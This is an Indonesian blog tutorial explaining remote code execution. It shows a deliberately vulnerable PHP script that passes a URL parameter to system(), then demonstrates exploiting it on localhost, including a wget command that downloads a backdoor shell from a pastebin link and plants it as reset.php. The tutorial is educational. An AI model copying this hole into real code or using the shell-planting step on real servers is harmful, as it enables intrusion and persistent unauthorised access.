meta content='Index, Follow' name='robots'/> Tutorial: Apa itu Remote Code Execution? dan Bagaimana Remote Code Execution itu bekerja?

Monday, December 31, 2018

Apa itu Remote Code Execution? dan Bagaimana Remote Code Execution itu bekerja?

Naufal Ardhani - Hallo gaes dah lama nih engga update artikel diblog ini karna gasempet buat nulis waktunya keambil terus sama kegiatan lain hehe , Kali ini Saya akan membahas sebuah metode yang bernama Remote Code Execution atau biasa disebut RCE.



Mungkin anda belum tau lebih jelas metode ini Apa itu Remote Code Execution? dan Bagaimana Remote Code Execution itu bekerja? silahkan simak ya ada dibawah jawabannya.



  • Apa itu Remote Code Execution?

Remote Code Execution merupakan bug dimana sang attacker mempunyai kemampuan untuk mengeksekusi perintah di mesin target, biasanya memanfaatkan kelemahan aplikasi yang dijadikan target eksploitasi, memungkinkan attacker untuk menjalankan command2 secara remote melalui url. Bug ini biasanya terdapat pada aplikasi yg mnggunakan cgi.


  • Bagaimana Remote Code Execution itu bekerja?

Script PHP Remote Code Execution sederhana :
<?php echo "RemoteCodeExecution | www.naufalardhani.com<br><br><br>"; $cmd=$_GET['action']; echo "Command : " . $cmd . "<br><br>"; system($cmd); ?>
Script diatas merupakan contoh script yang rentan pada PHP, Sesimple itu kah susunan script Remote Code Execution? yaps benar masalahnya ada di system($command),
Ini akan menjalankan fungsi yang berhubungan dengan sistem.

Disini saya sudah mengupload script Remote Code Execution ke localhost dengan nama tools.php sebagai contoh target dan saya akan mempraktekan bagaimana sang Attacker melakukan Remote Code Execution pada sistem,

  1. Saya membuka link http://localhost:8888/tools.php ( contoh target )
  2. Dan saya menambahkan ?action= setelah http://localhost:8888/tools.php untuk melakukan Remote Code Execution, jadi seperti berikut linknya http://localhost:8888/tools.php?action= dan saya mencoba menjalankan command ls untuk melihat isi directory, http://localhost:8888/tools.php?action=ls dan terdapat 1 folder dan 3 file.
  3. Lalu sang Attacker mencoba memanggil Shell Backdoor RESET dengan command wget, seperti ini commandnya "wget linkshell -O namafile.php", http://localhost:8888/tools.php?action=wget https://pastebin.com/raw/**** -O reset.php
  4. lalu kita cek Shellnya, http://localhost:8888/reset.php
Nahh sudah terupload shellnya :)

Sampai disini saja artikel kali ini semoga bermanfaat bagi kalian semua dan jika ada kesalahan dalam penulisan artikel ini mohon di maklumi karna saya sebagai penulis juga masih belajar.

Request artikel / Mengoreksi kesalahan dalam artikel? silahkan isi di kolom komentar.

No comments:

Post a Comment